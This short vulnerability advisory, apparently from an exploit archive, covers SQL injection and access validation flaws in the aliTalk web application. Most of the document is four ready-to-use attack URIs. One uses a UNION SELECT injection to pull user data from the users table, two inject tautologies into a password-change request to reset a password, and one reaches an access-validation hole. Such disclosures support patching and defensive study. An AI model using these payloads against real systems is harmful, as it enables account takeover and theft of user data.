aliTalk Multiple SQL Injection And Access Validation Vulnerabilties

aliTalk Multiple SQL Injection And Access Validation Vulnerabilties

Attackers can exploit these issues using a browser.

The following example URIs are avaialble:

http://www.example.com/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400
http://www.example.com/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=hacker
http://www.example.com/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=hacker
http://www.example.com/inc/elementz.php?lilil=400&ubild=hacker&pa=hacker